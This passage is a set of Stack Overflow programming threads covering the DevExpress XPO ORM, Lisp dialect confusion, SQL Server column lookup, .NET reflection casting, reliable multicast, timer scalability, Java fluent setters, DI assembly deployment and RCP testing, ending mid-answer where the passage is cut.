Q: Any thoughts on DevExpress XPO ORM Package? XPO is the object relational mapper of choice at my company. Any thoughts on the pros and cons? I was just looking for general feeling and anecdotes about the product. We are not switching to XPO. We are just getting rid of hard-coded SQL strings living in the app and moving completely to ORM for all data access.

A: I've been working with it for 6-7 months now, and the seller for me was the fact that all of their UI components work relatively seamlessly with XPO - and their UI components are top notch. Some might note that their forums are poorly monitored and have little useful traffic - this is true. The secret is to fill out tickets, though. They respond quickly and accurately to all of their support tickets.

A: XPO is, overall, easy to work with. However, it can be a little painful when you plan to work with a legacy database or try to introduce it into a brownfield app. The most painful obstacles I hit were:

* all objects need to inherit from XPO-related classes and/or use XPO-related attributes, so no POCO objects
* no support for read-only persistent fields out of the box; it's possible, but you need to do a little hacking to stop XPO from updating the field in the DB
* no support for pre-filtering associations, which can cause excessive network load
* poor support for foreign composite keys (to be fair, no ORM handles composite keys nicely; they are considered an "anti-ORM" pattern)
* a few small annoyances

As Dennis pointed out in the comments, XPO has been greatly improved since I wrote this answer originally. In particular, the following things are no longer an issue:

* no serialization, so XPO objects are hard to use in a disconnected WinForms scenario with data coming through web services - XPO now supports various serialization scenarios and can easily be used with WCF
* you cannot do many-to-many relation mapping with your own interim table; XPO wants a specific name for such interim tables - this is no longer the case
* no support for enums in the PostgreSQL provider - you just need to write a really simple value converter and you are good

Also, the following issues will no longer be a problem with the next XPO release, coming later this year:

* no support for keys of type long
* no support for DB schemas in the PostgreSQL provider

All in all, XPO has been greatly improved. The most painful obstacles were removed. You can still hit problems while working with a legacy DB, but in general XPO has become quite convenient to use.

A: XPO version 10.2 now supports both stored procedures and SQL queries. See information here...

A: Others will probably pitch in with technical answers (e.g. the query syntax, use of caching, ease or otherwise of mapping to an existing database structure) -- but if you have an established ORM layer, the answer is probably "why change"? I've used XPO successfully for years in an established commercial product with several hundred users. I find that it's fast, flexible and does the job. I don't see any need to change at the moment, as our data volumes aren't particularly large and the foibles (caching, mostly) are things we can work around. If I were starting afresh I'd definitely look at both NHibernate and the ADO.NET Entity Framework. In practice, though, all are good; I'd most likely look at the commercial situation for the project ahead of the technical questions. For instance, NHibernate is open source -- is there a viable community there to support the tool and to provide (if necessary) commercial support? XPO comes from a tools vendor -- are they likely to remain in business for the lifetime of the product? ADO.NET Entity Framework comes from Microsoft, who are notorious for changing database technologies more often than Larry fills his fighter with jet fuel -- will this, too, fade away?

A: I have found XPO very frustrating to work with. The main idea of an ORM is to abstract away the underlying data structure, but very quickly you'll notice that they have the default string length hardcoded to 60 chars, so you end up adding these ugly string.unlimited things around every string. So much for abstraction... When modelling more complex objects you have to use a lot of syntax that really has no place in your object model, like XPCollection. I wanted to store a class which had a dictionary of strings on it, but sadly XPO was not able to automatically store this in the database. So while it works OK for simple types, it very quickly breaks down when you want to store more complex things. That, combined with their mediocre support, really leaves a LOT to be desired.

A: The pros and cons compared to what? There are a lot of alternatives out there, the most popular being NHibernate, with the new kid 'ADO.NET Entity Framework' on the block. Anyway, there are hundreds of answers depending on your situation and requirements.

A: I like the fact that you can just create classes, and XPO creates the tables and relationships for you - so you can start from a blank database. One issue I don't like is that when I want to delete a whole bunch of stuff, it will go through my collection and do a delete on each one. This takes ages, so for this kind of case I've had to write some custom SQL (delete from table where blah). I'm no expert on XPO, but that's what I found.

A: I second the fact that deleting complex objects with some collections takes really, really long. So far neither the documentation nor the forums have been able to help me with this. Apart from that, it is really simple to use and gets you going quickly. It is also quite hard to figure out your memory usage; I had complex, big objects in my design, and working with them was a bigger memory hog than I had assumed.

A: This is all you need to do to start writing your domain objects (try to do the same in other systems):

    using System;
    using DevExpress.Xpo;
    using DevExpress.Data.Filtering;
    using NUnit.Framework;

    namespace XpoTdd {

        public class Person : XPObject {
            public Person(Session session) : base(session) { }
            public string FirstName { get; set; }
            public string LastName { get; set; }
            [Persistent]
            public string FullName {
                get { return FirstName + " " + LastName; }
            }
        }

        [TestFixture]
        public class PersonTests {
            [Test]
            public void TestPersistence() {
                const string connStr = "Integrated Security=SSPI;Pooling=false;Data Source=(local);Initial Catalog=XpoTddTest";

                UnitOfWork session1 = new UnitOfWork();
                session1.ConnectionString = connStr;
                Person me = new Person(session1);
                me.FirstName = "Roman";
                me.LastName = "Eremin";
                session1.CommitChanges();

                UnitOfWork session2 = new UnitOfWork();
                session2.ConnectionString = connStr;
                me = session2.FindObject<Person>(CriteriaOperator.Parse("FullName = 'Roman Eremin'"));
                Assert.AreEqual("Roman Eremin", me.FullName);
            }
        }
    }
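For illustration, here is a minimal sketch of the set-based delete workaround mentioned above. It deliberately uses plain ADO.NET rather than any XPO API, since the point is to bypass the per-object deletes; the table, column and connection string are hypothetical:

    using System.Data.SqlClient;

    static class BulkDelete
    {
        // One set-based DELETE statement instead of N ORM-tracked deletes.
        static void DeleteByLastName(string connStr, string lastName)
        {
            using (var connection = new SqlConnection(connStr))
            using (var command = new SqlCommand(
                "DELETE FROM Person WHERE LastName = @lastName", connection))
            {
                command.Parameters.AddWithValue("@lastName", lastName);
                connection.Open();
                command.ExecuteNonQuery();
            }
        }
    }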
{ "language": "en", "url": "https://stackoverflow.com/questions/31559", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "22" }
Q: Keeping CL and Scheme straight in your head. Depending on my mood I seem to waffle back and forth between wanting a Lisp-1 and a Lisp-2. Unfortunately, beyond the obvious namespace differences, this leaves all kinds of amusing function-name problems you run into. Case in point: trying to write some code tonight I tried to do (map #'function listvar), which, of course, doesn't work in CL at all. It took me a bit to remember I wanted mapcar, not map. Of course it doesn't help when SLIME/Emacs shows that map IS defined as something, though obviously not the same function at all. So, any pointers on how to minimize this, short of picking one or the other and sticking with it?

A: map is more general than mapcar. For example, you could do the following rather than using mapcar:

    (map 'list #'function listvar)

How do I keep Scheme and CL separate in my head? I guess when you know both languages well enough you just know what works in one and not the other. Despite the syntactic similarities, they are quite different languages in terms of style.

A: Well, I think that as soon as you get enough experience in both languages this becomes a non-issue (just as with similar natural languages, like Italian and Spanish). If you usually program in one language and switch to the other only occasionally, then unfortunately you are doomed to write Common Lisp in Scheme or vice versa ;) One thing that helps is to have a distinct visual environment for the two languages, using syntax highlighting in different colors, etc. Then at least you will always know whether you are in Common Lisp or Scheme mode.

A: I'm definitely aware that there are syntactic differences, though I'm certainly not fluent enough yet to automatically use them, making the code look much more similar currently ;-). And I had a feeling your answer would be the case, but one can always hope for a shortcut <_<.

A: The easiest way to keep both languages straight is to do your thinking and code writing in Common Lisp. Common Lisp code can be converted into Scheme code with relative ease; however, going from Scheme to Common Lisp can cause a few headaches. I remember once when I was using a letrec in Scheme to store both variables and functions and had to split it up into separate CL constructs for the variable and function namespaces respectively. In all practicality, though, I don't make a habit of writing CL code, which makes the times that I do have to all the more painful.
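For illustration, a small side-by-side sketch of the namespace difference discussed above (the Scheme half assumes an R5RS-style map over a single list):

    ;; Common Lisp: MAP needs a result-type argument; MAPCAR is list-specific.
    (mapcar #'1+ '(1 2 3))        ; => (2 3 4)
    (map 'list #'1+ '(1 2 3))     ; => (2 3 4), same result via the generic MAP

    ;; Common Lisp is a Lisp-2: functions live in their own namespace,
    ;; so they must be referenced with #' (FUNCTION).
    (defun double (x) (* 2 x))
    (mapcar #'double '(1 2 3))    ; => (2 4 6)

    ;; Scheme is a Lisp-1: one namespace, no #' needed, and MAP works
    ;; directly on lists.
    (define (double x) (* 2 x))
    (map double '(1 2 3))         ; => (2 4 6)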
{ "language": "en", "url": "https://stackoverflow.com/questions/31561", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "2" }
Q: Query to list all tables that contain a specific column with SQL Server 2005. Question as stated in the title.

A: http://blog.sqlauthority.com/2008/08/06/sql-server-query-to-find-column-from-all-tables-of-database/

    USE AdventureWorks
    GO
    SELECT t.name AS table_name
        ,SCHEMA_NAME(schema_id) AS schema_name
        ,c.name AS column_name
    FROM sys.tables AS t
    INNER JOIN sys.columns c ON t.OBJECT_ID = c.OBJECT_ID
    WHERE c.name LIKE '%EmployeeID%'
    ORDER BY schema_name
        ,table_name;
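A portable variant of the same lookup, as a sketch, uses the ANSI-standard catalog views instead of sys.tables (same hypothetical '%EmployeeID%' pattern; note that INFORMATION_SCHEMA.COLUMNS also reports columns of views, not just tables):

    SELECT TABLE_SCHEMA
        ,TABLE_NAME
        ,COLUMN_NAME
    FROM INFORMATION_SCHEMA.COLUMNS
    WHERE COLUMN_NAME LIKE '%EmployeeID%'
    ORDER BY TABLE_SCHEMA
        ,TABLE_NAME;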
{ "language": "en", "url": "https://stackoverflow.com/questions/31566", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "4" }
Q: How to properly cast objects created through reflection. I'm trying to wrap my head around reflection, so I decided to add plugin capability to a program that I'm writing. The only way to understand a concept is to get your fingers dirty and write the code, so I went the route of creating a simple interface library consisting of the IPlugin and IHost interfaces, a plugin implementation library of classes that implement IPlugin, and a simple console project that instantiates the IHost implementation class, which does simple work with the plugin objects.

Using reflection, I wanted to iterate through the types contained inside my plugin implementation DLL and create instances of those types. I was able to successfully instantiate classes with this code, but I could not cast the created object to the interface. I tried this code but I couldn't cast object o as I expected. I stepped through the process with the debugger and the proper constructor was called. Quick-watching object o showed me that it had the fields and properties that I expected to see in the implementation class.

    // loop through assemblies
    //   loop through types in assembly

    // Filter out unwanted types
    if (!type.IsClass || type.IsNotPublic || type.IsAbstract)
        continue;

    // This successfully created the right object
    object o = Activator.CreateInstance(type);

    // This threw an InvalidCastException or returned null for an "as" cast
    // even though the object implemented IPlugin
    IPlugin i = (IPlugin) o;

I made the code work with this:

    using System.Runtime.Remoting;

    ObjectHandle oh = Activator.CreateInstance(assembly.FullName, type.FullName);

    // This worked as I intended
    IPlugin i = (IPlugin) oh.Unwrap();
    i.DoStuff();

Here are my questions:

* Activator.CreateInstance(Type t) returns an object, but I couldn't cast the object to an interface that the object implemented. Why?
* Should I have been using a different overload of CreateInstance()?
* What are the reflection-related tips and tricks?
* Is there some crucial part of reflection that I'm just not getting?

A: I'm just guessing here, because from your code it's not obvious where you have the definition of the IPlugin interface, but if you can't cast in your host application, then you probably have the IPlugin interface in your host assembly and, at the same time, in your plugin assembly. This won't work. The easiest way to make this work is to have the IPlugin interface marked as public in your host assembly and then have your plugin assembly reference the host application assembly, so both assemblies have access to the very same interface.

A: Hmmm... if you are using Assembly.LoadFrom to load your assembly, try changing it to Assembly.LoadFile instead. Worked for me. From here: http://www.eggheadcafe.com/community/aspnet/2/10036776/solution-found.aspx

A: @lubos hasko You nailed it on the nose. My original design did have three different assemblies, with both the host and plugin implementation referencing the plugin interface assembly. I tried a separate solution with a host implementation and interface assembly and a plugin implementation assembly. Within that solution, the code in the first block worked as expected. You've given me a bit more to think about, because I'm not quite understanding why two assemblies referencing a common assembly don't get the same type out of the common assembly.

A: I was just trying to work this out myself and managed to stumble on the answer! I had 3 different C# projects:

* A - Plugin Interface project
* B - Host exe project -> references A
* C - Plugin Implementation project -> references A

I was getting the casting error as well, until I changed the assembly name of my Plugin Interface project to match the namespace of what I was trying to cast to. E.g.

    IPluginModule pluginModule = (IPluginModule)Activator.CreateInstance(curType);

was failing because the assembly that the IPluginModule interface was defined in was called 'Common'; the -type- I was casting to was 'Blah.Plugins.Common.IPluginModule', however. I changed the assembly name for the interface project to 'Blah.Plugins.Common' and the cast then succeeded. Hopefully this explanation helps someone. Back to the code..

A: Is your type not public? If so, call the overload that takes in a boolean:

    Activator.CreateInstance(type, true);

Also, in your first example, see if o is null, and if not, print out o.GetType().Name to see what it really is.

A: @Haacked I tried to keep the pseudocode simple. foreach's take up a lot of space and braces. I clarified it. o.GetType().FullName returns Plugins.Multiply, which is the expected object. Plugins.Multiply implements IPlugin. I stepped through the process in the debugger quite a few times until I gave up for the evening. Couldn't figure out why I couldn't cast it, because I watched the constructor fire until I got grumpy about the whole mess. Came back to it this evening and made it work, but I still don't understand why the cast failed in the first code block. The second code block works, but it feels off to me.

A: The link to egghead above is the main solution to the problem: use Assembly.LoadFile() instead of .LoadFrom().
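Putting the pieces of this thread together, here is a minimal sketch of a host-side loader (hypothetical names; it assumes IPlugin lives in a single shared assembly referenced by both the host and the plugin DLL, as the accepted advice requires):

    using System;
    using System.Reflection;

    // The shared contract from the question, defined once in its own assembly.
    public interface IPlugin
    {
        void DoStuff();
    }

    public static class PluginLoader
    {
        public static void LoadAndRun(string path)
        {
            // LoadFile rather than LoadFrom, per the egghead link above.
            Assembly assembly = Assembly.LoadFile(path);
            foreach (Type type in assembly.GetTypes())
            {
                // Filter out unwanted types, as in the question.
                if (!type.IsClass || type.IsNotPublic || type.IsAbstract)
                    continue;

                // Checking assignability first avoids the InvalidCastException.
                if (typeof(IPlugin).IsAssignableFrom(type))
                {
                    IPlugin plugin = (IPlugin)Activator.CreateInstance(type);
                    plugin.DoStuff();
                }
            }
        }
    }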
{ "language": "en", "url": "https://stackoverflow.com/questions/31567", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "10" }
Q: Broadcast like UDP with the reliability of TCP. I'm working on a .NET solution that is run completely inside a single network. When users make a change to the system, I want to launch an announcement and have everyone else hear it and act accordingly. Is there a way that we can broadcast out messages like this (like UDP will let you do) while keeping guaranteed delivery (like TCP)? This is on a small network (30-ish clients), if that makes a difference.

A: You could use Spread to do group communication.

A: @epatel - I second the SCTP suggestion (I voted up, but can't comment yet, so additional stuff here). SCTP has many great features and lots of flexibility. You can subdivide your connection into multiple streams, and choose the reliability of each and whether it is ordered or not. Alternatively, with the partial reliability extension, you can control reliability on a per-message basis.

A: Broadcast is not what you want. Since there could, and probably will, be devices attached to this network which don't care about your message, you should use multicast. Unlike broadcast messages, which must be sent to and processed by every client on the network, multicast messages are delivered only to interested clients (i.e. those which have some intention to receive this particular type of message and act on it). If you later scale this system up so that it needs to be routed over a large network, multicast can scale to that, whereas broadcast won't, so you gain a scalability benefit which you might appreciate later. Meanwhile you eliminate unnecessary overhead in switches and other devices that don't need to see these "something changed" messages.

A: You might want to look into RFC 3208, "PGM Reliable Transport Protocol Specification". Here is the abstract:

Pragmatic General Multicast (PGM) is a reliable multicast transport protocol for applications that require ordered or unordered, duplicate-free, multicast data delivery from multiple sources to multiple receivers. PGM guarantees that a receiver in the group either receives all data packets from transmissions and repairs, or is able to detect unrecoverable data packet loss. PGM is specifically intended as a workable solution for multicast applications with basic reliability requirements. Its central design goal is simplicity of operation with due regard for scalability and network efficiency.

A: You could use a message broker, such as ActiveMQ. Publish your messages to a topic and have the clients register durable subscriptions to the topic, so that they won't miss any messages even if they are not online. Apache ActiveMQ is a message broker written in Java together with a full JMS client. However, Apache ActiveMQ is designed to communicate over a number of protocols, such as Stomp and OpenWire, together with supporting a number of different language-specific clients. Client platform support includes C# and .NET.

A: Almost all games have a need for the fast-reacting properties (and to a lesser extent, the connectionless properties) of UDP and the reliability of TCP. What they do is build their own reliable protocol on top of UDP. This gives them the ability to just burst packets to wherever, and optionally make them reliable as well. The reliable packet system is usually a simple retry-until-acknowledged system, simpler than TCP, but there are protocols which go way beyond what TCP can offer. Your situation sounds very simple. You'll probably be able to make the cleanest solution yourself - just make every client send back an "I heard you" response and have the server keep trying until it gets it (or gives up). If you want something more, most custom protocol libraries are in C++, so I am not sure how much use they'll be to you. However, my knowledge here is a few years old - perhaps some protocols have been ported over by now. Hmm... RakNet and enet are two C/C++ libraries that come to mind.

A: Take a look at SCTP, which has a combination of TCP and UDP features. There is a Windows implementation available.

A: You could implement your own TCP-like behaviour at the application layer. So for instance, you'd send out the UDP broadcast, but then expect a reply response from each host. If you didn't get a response within X seconds, then send another, and so on until reaching some sort of threshold. If the threshold is reached (i.e. the host didn't respond at all), then report an error. To do this, though, you'd need a pre-defined list of hosts to expect the responses back from.

A: Create a TCP server. Have each client connect. In your TCP protocol with the clients, create each packet with a 2-byte prefix of the total size of the following message. Clients then call read(max_size=2) on the socket to determine the size of the next message, and then read(max_size=s) to collect the message. You get reliable, ordered messages - simple. You don't need a messaging framework for this one.

A: You'd definitely want to look into Pragmatic General Multicast: while TCP uses ACKs to acknowledge groups of packets sent (something that would be uneconomical over multicast), PGM uses the concept of Negative Acknowledgements (NAKs). For further G-diving, the term you're looking for is reliable multicast. Also take a look at Multipath TCP.

A: What you can do is, after the broadcast, have the clients initiate the TCP connections. Otherwise you just have to keep a list of all clients and initiate the connections to each client yourself.

A: I think there are three options, broadly speaking:

* Instead of broadcasting UDP, you could create an entity (a thread, process, server, service, or whatever the thing is that exists in your solution) that keeps a list of subscribers and sends unicast UDP messages to them.
* Use UDP multicast, but you'll have to write some sort of mechanism that takes care of reliable delivery for you (i.e., retries, timeouts, etc). This also means you have to get a reply from your clients.
* If you're not afraid of experimental transport protocols, you might look here for suggestions.

A: You should take a look at the NORM (NACK-Oriented Reliable Multicast) specification. You can find information about NORM here. The NORM protocol is designed to provide end-to-end reliable transport of bulk data objects or streams over generic IP multicast routing and forwarding services. NORM uses a selective, negative acknowledgement (NACK) mechanism for transport reliability and offers additional protocol mechanisms to conduct reliable multicast sessions with limited "a priori" coordination among senders and receivers. It is fairly well known in the military world. NORM specs. NORM source.

A: Why build something from scratch if you can use a library? Especially for such a small project? Try Emcaster, which itself uses reliable multicast messaging (PGM), is written in .NET, and comes with full source. You will get a nice pub/sub engine with topic filtering readily available. Or you can learn from the code how to do it and base your own extension on it.

A: I think the most irritating feature of TCP in these scenarios is the ability/way of sorting incoming packets into their original order - the concept of a stream. You cannot read a byte until the byte before it has arrived. If you can live without that, you have a chance to make your protocol fast and reliable, but without ordering of packets! It's simply impossible to have both, because you cannot order your bytes until you receive another copy of a lost packet - that's the main tradeoff.

A: Do an RDP multicast.
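For concreteness, here is a minimal sketch of the "ACK per client, retry until acknowledged" scheme that several answers describe, using .NET's UdpClient. The message format and timeouts are hypothetical, and a real implementation would also need sequence numbers so retries can be de-duplicated:

    using System;
    using System.Collections.Generic;
    using System.Net;
    using System.Net.Sockets;
    using System.Text;

    class ReliableAnnouncer
    {
        // Send an announcement to each known client and retry until
        // every one has replied with a short "ACK" datagram.
        static void Announce(List<IPEndPoint> clients, string message, int maxRetries)
        {
            byte[] payload = Encoding.UTF8.GetBytes(message);
            var pending = new HashSet<IPEndPoint>(clients);

            using (var udp = new UdpClient(0))
            {
                udp.Client.ReceiveTimeout = 500;  // ms to wait for ACKs per round

                for (int attempt = 0; attempt < maxRetries && pending.Count > 0; attempt++)
                {
                    foreach (IPEndPoint client in pending)
                        udp.Send(payload, payload.Length, client);

                    // Collect ACKs until the socket times out for this round.
                    try
                    {
                        while (pending.Count > 0)
                        {
                            var remote = new IPEndPoint(IPAddress.Any, 0);
                            byte[] reply = udp.Receive(ref remote);
                            if (Encoding.UTF8.GetString(reply) == "ACK")
                                pending.Remove(remote);
                        }
                    }
                    catch (SocketException)
                    {
                        // Timeout: fall through and retry the remaining clients.
                    }
                }
            }

            if (pending.Count > 0)
                Console.WriteLine("Gave up on {0} client(s).", pending.Count);
        }
    }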
{ "language": "en", "url": "https://stackoverflow.com/questions/31572", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "19" }
Q: How scalable is System.Threading.Timer? I'm writing an app that will need to make use of timers, but potentially very many of them. How scalable is the System.Threading.Timer class? The documentation merely says it's "lightweight", but doesn't explain further. Do these timers get sucked into a single thread (or very small thread pool) that processes all the callbacks on behalf of a Timer, or does each Timer have its own thread? I guess another way to rephrase the question is: how is System.Threading.Timer implemented?

A: I think you might want to rethink your design (that is, if you have control over the design yourself). If you're using so many timers that this is actually a concern for you, there's clearly some potential for consolidation there. Here's a good article from MSDN Magazine from a few years ago that compares the three available timer classes, and gives some insight into their implementations: http://msdn.microsoft.com/en-us/magazine/cc164015.aspx

A: Consolidate them. Create a timer service and ask that for the timers. It will only need to keep one active timer (for the next due call)... For this to be an improvement over just creating lots of Threading.Timer objects, you have to assume that it isn't exactly what Threading.Timer is already doing internally. I'd be interested to know how you came to that conclusion (I haven't disassembled the native bits of the framework, so you could well be right).

A: I say this in response to a lot of questions: don't forget that the (managed) source code to the framework is available. You can use this tool to get it all: http://www.codeplex.com/NetMassDownloader Unfortunately, in this specific case, a lot of the implementation is in native code, so you don't get to look at it... They definitely use pool threads rather than a thread per timer, though. The standard way to implement a big collection of timers (which is how the kernel does it internally, and I would suspect is indirectly how your big collection of Timers ends up) is to maintain the list sorted by time-until-expiry - so the system only ever has to worry about checking the next timer which is going to expire, not the whole list. Roughly, this gives O(log n) for starting a timer and O(1) for processing running timers.

Edit: I've just been looking in Jeff Richter's book. He says (of Threading.Timer) that it uses a single thread for all Timer objects; this thread knows when the next timer (i.e. as above) is due and calls ThreadPool.QueueUserWorkItem for the callbacks as appropriate. This has the effect that if you don't finish servicing one callback on a timer before the next is due, your callback will re-enter on another pool thread. So in summary, I doubt you'll see a big problem with having lots of timers, but you might suffer thread pool exhaustion if large numbers of them are firing at the same time and/or their callbacks are slow-running.

A: ^^ As DannySmurf says: consolidate them. Create a timer service and ask that for the timers. It will only need to keep one active timer (for the next due call) and a history of all the timer requests, and recalculate this on AddTimer() / RemoveTimer().
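For illustration, a minimal sketch of the consolidation idea from the answers (hypothetical API; a single System.Threading.Timer is re-armed to fire at whichever registered callback is due next, mirroring the sorted-by-expiry scheme described above):

    using System;
    using System.Collections.Generic;
    using System.Threading;

    // One underlying timer serves many scheduled callbacks.
    class TimerService
    {
        private readonly object _gate = new object();
        // Due times kept sorted; the first key is always the next to fire.
        private readonly SortedDictionary<DateTime, List<Action>> _schedule =
            new SortedDictionary<DateTime, List<Action>>();
        private readonly Timer _timer;

        public TimerService()
        {
            _timer = new Timer(OnTick, null, Timeout.Infinite, Timeout.Infinite);
        }

        public void AddTimer(TimeSpan delay, Action callback)
        {
            lock (_gate)
            {
                DateTime due = DateTime.UtcNow + delay;
                if (!_schedule.TryGetValue(due, out List<Action> list))
                    _schedule[due] = list = new List<Action>();
                list.Add(callback);
                Rearm();
            }
        }

        // Point the single timer at the earliest entry (call under the lock).
        private void Rearm()
        {
            foreach (KeyValuePair<DateTime, List<Action>> next in _schedule)
            {
                TimeSpan wait = next.Key - DateTime.UtcNow;
                _timer.Change(wait < TimeSpan.Zero ? TimeSpan.Zero : wait,
                              Timeout.InfiniteTimeSpan);
                return;
            }
            _timer.Change(Timeout.Infinite, Timeout.Infinite);  // nothing scheduled
        }

        private void OnTick(object state)
        {
            List<Action> due = null;
            lock (_gate)
            {
                foreach (KeyValuePair<DateTime, List<Action>> next in _schedule)
                {
                    if (next.Key <= DateTime.UtcNow)
                    {
                        due = next.Value;
                        _schedule.Remove(next.Key);
                    }
                    break;  // only the earliest entry is ever of interest
                }
                Rearm();
            }
            // Hand callbacks to the pool, as Threading.Timer itself does.
            if (due != null)
                foreach (Action callback in due)
                    ThreadPool.QueueUserWorkItem(_ => callback());
        }
    }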
{ "language": "en", "url": "https://stackoverflow.com/questions/31581", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "26" }
Q: Design: Java and returning self-reference in setter methods. For classes that have a long list of setters that are used frequently, I found this way very useful (although I have recently read about the Builder pattern in Effective Java, which is kind of the same). Basically, all setter methods return the object itself, so then you can use code like this:

    myClass
        .setInt(1)
        .setString("test")
        .setBoolean(true);

Setters simply return this at the end:

    public MyClass setInt(int anInt) {
        // [snip]
        return this;
    }

What is your opinion? What are the pros and cons? Does this have any impact on performance? This is also referred to as the named parameter idiom in C++.

A: I wouldn't do it myself, because to me it muddies what a particular method does, and the method chaining is of limited use to me over doing it longhand. It isn't going to send me into a quivering ball of rage and psychosis, though, which is always a good thing. :') I wouldn't be concerned about performance; just ask Knuth.

A: @pek Chained invocation is one of the proposals for Java 7. It says that if a method's return type is void, it should implicitly return this. If you're interested in this topic, there is a bunch of links and a simple example on Alex Miller's Java 7 page.

A: This is called a fluent interface, for reference. Personally, I think it's a pretty neat idea, but a matter of taste really. I think jQuery works this way.

A: I find this to be in poor style when used in setters. Immutable classes are usually a better fit for chaining, such as:

    aWithB = myObject.withA(someA).withB(someB);

where myObject is of this class:

    class MyClass {
        MyClass withA(TypeA a) {
            return this.a.equals(a) ? this : new MyClass(this, a);
        }

        private MyClass(MyClass copy, TypeA a) {
            this(copy);
            this.a = a;
        }
    }

The builder pattern is also useful, since it allows the final object to be immutable while preventing the intermediate instances you would normally have to create when using this technique.

A: It makes sense for builders, where all you are going to do is set a load of stuff, create the real object and throw the builder away. For builders, you might as well get rid of the "set" part of the method name. Similarly, immutable types don't really need the "get".

    Something thing = new SomethingBuilder()
        .aProperty(wotsit)
        .anotherProperty(somethingElse)
        .create();

A useful trick (if you don't mind a ~2K runtime overhead per class) is to use the double brace idiom:

    JFrame frame = new JFrame("My frame") {{
        setDefaultCloseOperation(DISPOSE_ON_CLOSE);
        setLocation(frameTopLeft);
        add(createContents());
        pack();
        setVisible(true);
    }};

A: This idea is seen a lot in C++; it allows operations to be cascaded. For example:

    std::cout << "this" << "is" << "cascading"

works because the stream method << returns an instance of itself (*this). See this: http://www.java2s.com/Tutorial/Cpp/0180__Class/Cascadingmemberfunctioncallswiththethispointer.htm

A: I used to be a fan of the Java (and worse, C#) practice of making getters and setters (get/set properties) throughout an object. This used to be what I considered object-oriented, but really this just leads us to exposing the guts and implementation of the object, not really taking advantage of encapsulation. There are times you can't get away from this (OR/M comes to mind), but in general the object should be set up and then perform its function. My dream objects tend to have one or two constructors, and maybe a half dozen functions that do work. The reason for this is that once I started developing APIs there is a real need to keep things simple. You really only want to add as much complexity as is required to get the job done, and getters and setters, while simple in themselves, add complexity in heaps when added en masse. What happens when I load setters in a different order? Anything different? Are you sure?

A: @Dan Again, for more complex situations (immutability comes to mind) the Builder pattern is a great solution. Also, I agree with you mostly on getters. I believe what you are saying is to mostly follow the "tell, don't ask" paradigm, and I greatly agree. But that is oriented mostly at getters. Lastly, all of the above are for classes that have a great number of attributes. I don't see a reason for any of this if you only have fewer than, say, 7.

A: I ended up doing this a lot when working with the Apache POI Excel library; I ended up writing helper methods that chained so I could apply formatting, data types, internal cell data, formulas, and cell positioning. For stuff with lots of little tiny flyweight elements that need to have finicky little tweaks applied, it works pretty well.

A: How to use:

    /**
     * @author sanjay
     */
    public class NewClass {

        private int left;
        private int top;

        public void set(int x, int y) {
            left = x;
            top = y;
        }

        public NewClass UP(int x) {
            top += x;
            return this;
        }

        public NewClass DOWN(int x) {
            top -= x;
            return this;
        }

        public NewClass RIGHT(int x) {
            left += x;
            return this;
        }

        public NewClass LEFT(int x) {
            left -= x;
            return this;
        }

        public void Display() {
            System.out.println("TOP:" + top);
            System.out.println("LEFT:" + left);
        }

        public static void main(String[] args) {
            NewClass test = new NewClass();
            test.set(0, 0);
            test.Display();
            test.UP(20).UP(45).DOWN(12).RIGHT(32).LEFT(20);
            test.Display();
        }
    }

A: I agree with @Bernard that method chaining like this muddles the purpose of the setters. Instead, I would suggest that if you are always creating chains of setters like this, you create a custom constructor for your class, so instead of

    MyClass
        .setInt(1)
        .setString("test")
        .setBoolean(true);

you do

    new MyClass(1, "test", true);

This makes it more readable, and you can use this to make your class immutable if you choose to.
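For reference, a minimal sketch of the Builder pattern that several answers point to as the alternative (hypothetical class; the built object stays immutable while the throwaway builder absorbs the chained calls):

    // Immutable target object; all chaining happens on the builder.
    public final class Widget {
        private final int anInt;
        private final String aString;
        private final boolean aBoolean;

        private Widget(Builder b) {
            this.anInt = b.anInt;
            this.aString = b.aString;
            this.aBoolean = b.aBoolean;
        }

        public static class Builder {
            private int anInt;
            private String aString;
            private boolean aBoolean;

            public Builder anInt(int value)        { this.anInt = value; return this; }
            public Builder aString(String value)   { this.aString = value; return this; }
            public Builder aBoolean(boolean value) { this.aBoolean = value; return this; }

            public Widget create() {
                return new Widget(this);
            }
        }
    }

    // Usage:
    // Widget thing = new Widget.Builder().anInt(1).aString("test").aBoolean(true).create();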
{ "language": "en", "url": "https://stackoverflow.com/questions/31584", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "22" }
Q: How to get the libraries you need into the bin folder when using IoC/DI. I'm using Castle Windsor to do some dependency injection; specifically, I've abstracted the DAL layer to interfaces that are now being loaded by DI. Once the project is developed and deployed, all the .bin files will be in the same location, but while I'm developing in Visual Studio, the only ways I can see of getting the dependency-injected project's .bin file into the startup project's bin folder are to either have a post-build event that copies it in, or to put in a manual reference to the DAL project to pull the file in. I'm not totally thrilled with either solution, so I was wondering if there is a 'standard' way of solving this problem?

A: Could you set the build output path of the concrete DAL project to be the bin folder of the dependent project?

A: Mike: Didn't think of that, that could work. I'd have to remember to turn off copy-local for any libraries/projects that are common between them.
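For reference, the post-build event mentioned in the question might look something like this (the project name is hypothetical; $(TargetDir), $(SolutionDir) and $(ConfigurationName) are standard Visual Studio build macros):

    xcopy /Y /D "$(TargetDir)*.dll" "$(SolutionDir)StartupProject\bin\$(ConfigurationName)\"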
{ "language": "en", "url": "https://stackoverflow.com/questions/31592", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "1" }
Q: Testing a client-server application. I am coding a client-server application using Eclipse's RCP. We are having trouble testing the interaction between the two sides, as they both contain a lot of GUI and provide no command-line or other remote API. Got any ideas?

A: I have about 1.5 years' worth of experience with the RCP framework; I really liked it. We simply used JUnit for testing... It's sort of cliché to say, but if it's not easy to test, maybe the design needs some refactoring? Java and the RCP framework provide great facilities for keeping GUI code and logic code separate. We used the MVC pattern with the Observer/Observable constructs that are available in Java... If you don't know about the Observer/Observable constructs in Java, I would HIGHLY recommend you take a look at this: http://www.javaworld.com/javaworld/jw-10-1996/jw-10-howto.html. You will use it all the time and your apps will be easier to test.

A: As a former test & commissioning manager, I would strongly argue for a test API. It does not remove the need for user interface testing, but you will be able to add automated tests and non-regression tests. If it's absolutely impossible, I would set up a test proxy, where you will be able to:

